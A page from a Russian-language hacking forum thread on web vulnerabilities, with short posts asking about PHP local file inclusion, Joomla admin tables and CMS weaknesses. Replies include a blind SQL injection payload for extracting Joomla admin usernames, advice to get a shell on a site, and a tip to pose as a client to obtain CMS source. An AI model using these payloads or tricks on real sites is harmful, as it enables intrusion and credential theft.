HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #501  
Старый 16.11.2013, 06:30
KukMan
Новичок
Регистрация: 22.02.2010
Сообщений: 0
Провел на форуме:
975

Репутация: 0
По умолчанию

Подскажите, а что, нет способа убрать суффикс в Local File Inclusion в PHP 5.3.3? Переполнение и нулевой байт не работают
 
Ответить с цитированием

  #502  
Старый 18.11.2013, 10:42
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

В какой таблице в джумле можно глянуть список администраторов? или где это вообще поссмотреть?
 
Ответить с цитированием

  #503  
Старый 18.11.2013, 19:59
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Br@!ns  
Br@!ns said:
В какой таблице в джумле можно глянуть список администраторов? или где это вообще поссмотреть?
Код:
Code:
select * from jos_users where usertype= 'Super Administrator';
[B]Joomla
 
Ответить с цитированием

  #504  
Старый 19.11.2013, 22:06
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

[QUOTE="BigBear"]
BigBear said:
Код:
Code:
select * from jos_users where usertype= 'Super Administrator';
[B]Joomla
 
Ответить с цитированием

  #505  
Старый 19.11.2013, 22:40
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от Br@!ns  
Br@!ns said:
В какой таблице в джумле можно глянуть список администраторов? или где это вообще поссмотреть?
как поставели вопрос, такой получили и ответ!

Цитата:
Сообщение от Br@!ns  
Br@!ns said:
скуля блиндовая, невыйдет. Есть другие способы?
Так и запрос составте под блинд, посимвольно и выдергивайте:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]and([/COLOR][COLOR="#0000BB"]select ascii[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]mid[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]username[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]))>[/COLOR][COLOR="#0000BB"]40 from jos_users where usertype[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0x53757065722041646D696E6973747261746F72 limit 0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]) --[/COLOR][/COLOR
 
Ответить с цитированием

  #506  
Старый 27.12.2013, 14:52
KroSaver
Guest
Сообщений: n/a
Провел на форуме:
2174

Репутация: 0
По умолчанию

Здраствуйте.

Какими способами можно распознать движок сайта?
 
Ответить с цитированием

  #507  
Старый 03.01.2014, 12:12
wowgamr
Guest
Сообщений: n/a
Провел на форуме:
777

Репутация: 0
По умолчанию

Здравствуйте!

Подскажите, пожалуйста, что за движок?

drdre5.ru

PS нашёл. это бм Shop
 
Ответить с цитированием

  #508  
Старый 15.01.2014, 09:14
fakecoder
Guest
Сообщений: n/a
Провел на форуме:
3698

Репутация: 2
По умолчанию

Ребята, а не подскажите где можно глянуть исходники Site Sapies любой версии?

В частности интересует с чем там пасс хешится, да и вообще хочется глянуть эту cms
 
Ответить с цитированием

  #509  
Старый 15.01.2014, 09:29
Unknown
Guest
Сообщений: n/a
Провел на форуме:
114076

Репутация: 54
По умолчанию

Цитата:
Сообщение от fakecoder  
fakecoder said:
Ребята, а не подскажите где можно глянуть исходники Site Sapies любой версии?
В частности интересует с чем там пасс хешится, да и вообще хочется глянуть эту cms
Если вам очень повезет - найдете на каких-нибудь файлопомойках. Вообще это такая самопальная цмска, которую впаривают как "разработку сайта".

Есть маленькое overview:

http://www.sitesapiens.ru/site_sapiens_description.pdf

В таких случаях, как правило, только получив шелл\чтение на одном из сайтов.

UPD: Иногда в таких случаях удается развести авторов на демку этой цмс, попробуйте написать им, прикинувшись потенциальным клиентом.
 
Ответить с цитированием

  #510  
Старый 18.01.2014, 18:42
ysmat
Познающий
Регистрация: 20.04.2006
Сообщений: 67
Провел на форуме:
170762

Репутация: -1
По умолчанию

есть ли какие слабости у 1С-битрикс Управление сайтом

согласен на платный приват
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Задай Вопрос - Получи Ответ] ZAMUT Уязвимости CMS / форумов 316 08.06.2010 09:56
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Простой вопрос про сниффер errou PHP 15 30.01.2006 20:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ